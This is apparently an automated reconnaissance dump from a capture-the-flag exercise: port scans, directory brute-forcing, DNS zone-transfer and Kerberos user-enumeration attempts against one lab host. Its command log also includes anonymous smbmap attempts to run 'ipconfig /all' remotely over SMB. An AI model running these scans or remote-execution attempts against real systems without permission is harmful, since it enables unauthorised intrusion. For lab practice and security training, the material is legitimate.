LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-593-ncacn_http/rpcdump.md Normal file
View File

@@ -0,0 +1,15 @@
```bash
impacket-rpcdump -port 593 10.129.243.131
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp593/tcp_593_rpc_rpcdump.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp593/tcp_593_rpc_rpcdump.txt):
```
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Retrieving endpoint list from 10.129.243.131
[-] Protocol failed: Could not connect: timed out
[*] No endpoints found.
```

3
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Curl Robots.md Normal file
View File

@@ -0,0 +1,3 @@
```bash
curl -sSikf http://10.129.243.131:80/robots.txt
```

60
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Curl.md Normal file
View File

@@ -0,0 +1,60 @@
```bash
curl -sSik http://10.129.243.131:80/
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_curl.html](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_curl.html):
```
HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Fri, 20 Aug 2021 13:39:48 GMT
Accept-Ranges: bytes
ETag: "0eaf6d7c895d71:0"
Server: Microsoft-IIS/10.0
Date: Sat, 28 Oct 2023 12:50:12 GMT
Content-Length: 1034
<!DOCTYPE html>
<html lang="en" >
<head>
<meta charset="UTF-8">
<title>Slandovia Energy</title>
<link rel='stylesheet' href='https://ajax.googleapis.com/ajax/libs/jqueryui/1.11.2/themes/smoothness/jquery-ui.css'><link rel="stylesheet" href="./style.css">
<script src="https://cdnjs.cloudflare.com/ajax/libs/prefixfree/1.0.7/prefixfree.min.js"></script>
</head>
<body>
<!-- partial:index.partial.html -->
<link href='https://fonts.googleapis.com/css?family=Open+Sans|Maven+Pro:500' rel='stylesheet' type='text/css'>
<div class="deco topdeco">
<span></span>
<span></span>
<span></span>
<span></span>
</div>
<h1>MegaCorp</h1>
<h3>
Slandovia Energy Grid
</h3>
<section class="list-wrap">
<label for="search-text">Check Status</label>
<input type="text" id="search-text" placeholder="search" class="search-box">
<span class="list-count"></span>
<ul id="list">
<span class="empty-item">no results</span>
</ul>
</section>
<!-- partial -->
<script src="./script.js"></script>
</body>
</html>
```

18
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Directory Buster.md Normal file
View File

@@ -0,0 +1,18 @@
```bash
feroxbuster -u http://10.129.243.131:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt):
```
200 GET 25l 72w 692c http://10.129.243.131/script.js
200 GET 215l 294w 3166c http://10.129.243.131/style.css
200 GET 41l 66w 1034c http://10.129.243.131/
200 GET 41l 66w 1034c http://10.129.243.131/Index.html
200 GET 8l 168w 1092c http://10.129.243.131/LICENSE.txt
200 GET 1l 14w 116c http://10.129.243.131/Search.php
200 GET 41l 66w 1034c http://10.129.243.131/index.html
200 GET 8l 168w 1092c http://10.129.243.131/license.txt
200 GET 1l 14w 116c http://10.129.243.131/search.php
```

3
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Known Security.md Normal file
View File

@@ -0,0 +1,3 @@
```bash
curl -sSikf http://10.129.243.131:80/.well-known/security.txt
```

20
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Nmap HTTP.md Normal file
View File

@@ -0,0 +1,20 @@
```bash
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.243.131
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt):
```
# Nmap 7.93 scan initiated Sat Oct 28 13:49:45 2023 as: nmap -vv --reason -Pn -T4 -sV -p 80 "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml 10.129.243.131
Nmap scan report for 10.129.243.131
Host is up, received user-set.
Scanned at 2023-10-28 13:49:48 CEST for 1s
PORT STATE SERVICE REASON VERSION
80/tcp filtered http no-response
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 28 13:49:49 2023 -- 1 IP address (1 host up) scanned in 4.02 seconds
```

10
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/whatweb.md Normal file
View File

@@ -0,0 +1,10 @@
```bash
whatweb --color=never --no-errors -a 3 -v http://10.129.243.131:80 2>&1
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_whatweb.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_whatweb.txt):
```
```

3
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/wkhtmltoimage.md Normal file
View File

@@ -0,0 +1,3 @@
```bash
wkhtmltoimage --format png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png
```

20
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-88-kerberos-sec/Nmap Kerberos.md Normal file
View File

@@ -0,0 +1,20 @@
```bash
nmap -vv --reason -Pn -T4 -sV -p 88 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/xml/tcp_88_kerberos_nmap.xml" 10.129.243.131
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt):
```
# Nmap 7.93 scan initiated Sat Oct 28 13:49:45 2023 as: nmap -vv --reason -Pn -T4 -sV -p 88 --script=banner,krb5-enum-users -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/xml/tcp_88_kerberos_nmap.xml 10.129.243.131
Nmap scan report for 10.129.243.131
Host is up, received user-set.
Scanned at 2023-10-28 13:49:47 CEST for 1s
PORT STATE SERVICE REASON VERSION
88/tcp filtered kerberos-sec no-response
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 28 13:49:48 2023 -- 1 IP address (1 host up) scanned in 3.64 seconds
```

22
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-123-ntp/Nmap NTP.md Normal file
View File

@@ -0,0 +1,22 @@
```bash
nmap -vv --reason -Pn -T4 -sU -sV -p 123 --script="banner,(ntp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/udp_123_ntp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/xml/udp_123_ntp_nmap.xml" 10.129.243.131
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/udp_123_ntp_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/udp_123_ntp_nmap.txt):
```
# Nmap 7.93 scan initiated Sat Oct 28 14:15:18 2023 as: nmap -vv --reason -Pn -T4 -sU -sV -p 123 "--script=banner,(ntp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/udp_123_ntp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/xml/udp_123_ntp_nmap.xml 10.129.243.131
Nmap scan report for megacorp.htb (10.129.243.131)
Host is up, received user-set (0.056s latency).
Scanned at 2023-10-28 14:15:19 CEST for 10s
PORT STATE SERVICE REASON VERSION
123/udp open ntp udp-response ttl 127 NTP v3
| ntp-info:
|_ receive time stamp: 2023-10-28T12:15:20
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 28 14:15:29 2023 -- 1 IP address (1 host up) scanned in 11.02 seconds
```

29
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/DNS Reverse Lookup.md Normal file
View File

@@ -0,0 +1,29 @@
```bash
dig -p 53 -x 10.129.243.131 @10.129.243.131
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_reverse-lookup.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_reverse-lookup.txt):
```
;; communications error to 10.129.243.131#53: timed out
;; communications error to 10.129.243.131#53: timed out
; <<>> DiG 9.18.11-2-Debian <<>> -p 53 -x 10.129.243.131 @10.129.243.131
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 16548
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;131.243.129.10.in-addr.arpa. IN PTR
;; Query time: 4303 msec
;; SERVER: 10.129.243.131#53(10.129.243.131) (UDP)
;; WHEN: Sat Oct 28 14:15:33 CEST 2023
;; MSG SIZE rcvd: 56
```

21
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/DNS Zone Transfer.md Normal file
View File

@@ -0,0 +1,21 @@
```bash
dig AXFR -p 53 @10.129.243.131
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_zone-transfer.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_zone-transfer.txt):
```
;; communications error to 10.129.243.131#53: timed out
;; communications error to 10.129.243.131#53: timed out
; <<>> DiG 9.18.11-2-Debian <<>> AXFR -p 53 @10.129.243.131
; (1 server found)
;; global options: +cmd
;; Query time: 4299 msec
;; SERVER: 10.129.243.131#53(10.129.243.131) (UDP)
;; WHEN: Sat Oct 28 14:15:33 CEST 2023
;; MSG SIZE rcvd: 28
```

40
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/Nmap DNS.md Normal file
View File

@@ -0,0 +1,40 @@
```bash
nmap -vv --reason -Pn -T4 -sU -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml" 10.129.243.131
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt):
```
# Nmap 7.93 scan initiated Sat Oct 28 14:15:18 2023 as: nmap -vv --reason -Pn -T4 -sU -sV -p 53 "--script=banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml 10.129.243.131
Nmap scan report for megacorp.htb (10.129.243.131)
Host is up, received user-set.
Scanned at 2023-10-28 14:15:19 CEST for 116s
PORT STATE SERVICE REASON VERSION
53/udp open domain? udp-response
| fingerprint-strings:
| DNS-SD:
| _services
| _dns-sd
| _udp
|_ local
| dns-nsec3-enum:
|_ DNSSEC NSEC3 not supported
|_dns-cache-snoop: 0 of 100 tested domains are cached.
| dns-nsec-enum:
|_ No NSEC records found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-UDP:V=7.93%I=7%D=10/28%Time=653CFB97%P=x86_64-pc-linux-gnu%r(AFS
SF:VersionRequest,20,"\0\0\x83\x81\0\0\0\0\0\0\0e\0\0\0\0\0\0\0\0\r\x05\0\
SF:0\0\0\0\0\0\0\0\0")%r(DNS-SD,2E,"\0\0\x80\x82\0\x01\0\0\0\0\0\0\t_servi
SF:ces\x07_dns-sd\x04_udp\x05local\0\0\x0c\0\x01");
Host script results:
| dns-brute:
|_ DNS Brute-force hostnames: No results.
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 28 14:17:15 2023 -- 1 IP address (1 host up) scanned in 116.97 seconds
```

288
LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_commands.log Normal file
View File

@@ -0,0 +1,288 @@
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131
dig -p 53 -x 10.129.243.131 @10.129.243.131
dig AXFR -p 53 @10.129.243.131
nmap -vv --reason -Pn -T4 -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/xml/tcp_53_dns_nmap.xml" 10.129.243.131
feroxbuster -u http://10.129.243.131:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
curl -sSikf http://10.129.243.131:80/.well-known/security.txt
curl -sSikf http://10.129.243.131:80/robots.txt
curl -sSik http://10.129.243.131:80/
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.243.131
whatweb --color=never --no-errors -a 3 -v http://10.129.243.131:80 2>&1
wkhtmltoimage --format png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png
nmap -vv --reason -Pn -T4 -sV -p 88 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/xml/tcp_88_kerberos_nmap.xml" 10.129.243.131
impacket-getArch -target 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -p 135 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml" 10.129.243.131
impacket-rpcdump -port 135 10.129.243.131
enum4linux -a -M -l -d 10.129.243.131 2>&1
nbtscan -rvh 10.129.243.131 2>&1
nmap -vv --reason -Pn -T4 -sV -p 139 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml" 10.129.243.131
smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1
smbmap -H 10.129.243.131 -P 139 2>&1
nmap -vv --reason -Pn -T4 -sV -p 389 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/xml/tcp_389_ldap_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -p 445 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_nmap.xml" 10.129.243.131
smbmap -H 10.129.243.131 -P 445 2>&1
nmap -vv --reason -Pn -T4 -sV -p 464 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/xml/tcp_464_kerberos_nmap.xml" 10.129.243.131
impacket-rpcdump -port 593 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -p 3268 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -p 49667 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49667/tcp_49667_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49667/xml/tcp_49667_rpc_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -p 49673 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49673/tcp_49673_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49673/xml/tcp_49673_rpc_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -p 49695 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49695/tcp_49695_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49695/xml/tcp_49695_rpc_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -p 49843 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49843/tcp_49843_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49843/xml/tcp_49843_rpc_nmap.xml" 10.129.243.131
smbmap -u null -p "" -H 10.129.243.131 -P 139 2>&1
smbmap -u null -p "" -H 10.129.243.131 -P 445 2>&1
smbmap -H 10.129.243.131 -P 139 -R 2>&1
smbmap -H 10.129.243.131 -P 445 -R 2>&1
smbmap -u null -p "" -H 10.129.243.131 -P 445 -R 2>&1
smbmap -u null -p "" -H 10.129.243.131 -P 139 -R 2>&1
smbmap -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1
smbmap -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1
smbmap -u null -p "" -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1
smbmap -u null -p "" -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131
dig -p 53 -x 10.129.243.131 @10.129.243.131
dig AXFR -p 53 @10.129.243.131
nmap -vv --reason -Pn -T4 -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/xml/tcp_53_dns_nmap.xml" 10.129.243.131
feroxbuster -u http://10.129.243.131:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
curl -sSikf http://10.129.243.131:80/.well-known/security.txt
curl -sSikf http://10.129.243.131:80/robots.txt
curl -sSik http://10.129.243.131:80/
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.243.131
whatweb --color=never --no-errors -a 3 -v http://10.129.243.131:80 2>&1
wkhtmltoimage --format png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png
nmap -vv --reason -Pn -T4 -sV -p 88 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/xml/tcp_88_kerberos_nmap.xml" 10.129.243.131
impacket-getArch -target 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -p 135 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml" 10.129.243.131
impacket-rpcdump -port 135 10.129.243.131
enum4linux -a -M -l -d 10.129.243.131 2>&1
nbtscan -rvh 10.129.243.131 2>&1
nmap -vv --reason -Pn -T4 -sV -p 139 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml" 10.129.243.131
smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1
smbmap -H 10.129.243.131 -P 139 2>&1
nmap -vv --reason -Pn -T4 -sV -p 389 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/xml/tcp_389_ldap_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -p 445 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_nmap.xml" 10.129.243.131
smbmap -H 10.129.243.131 -P 445 2>&1
nmap -vv --reason -Pn -T4 -sV -p 464 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/xml/tcp_464_kerberos_nmap.xml" 10.129.243.131
impacket-rpcdump -port 593 10.129.243.131
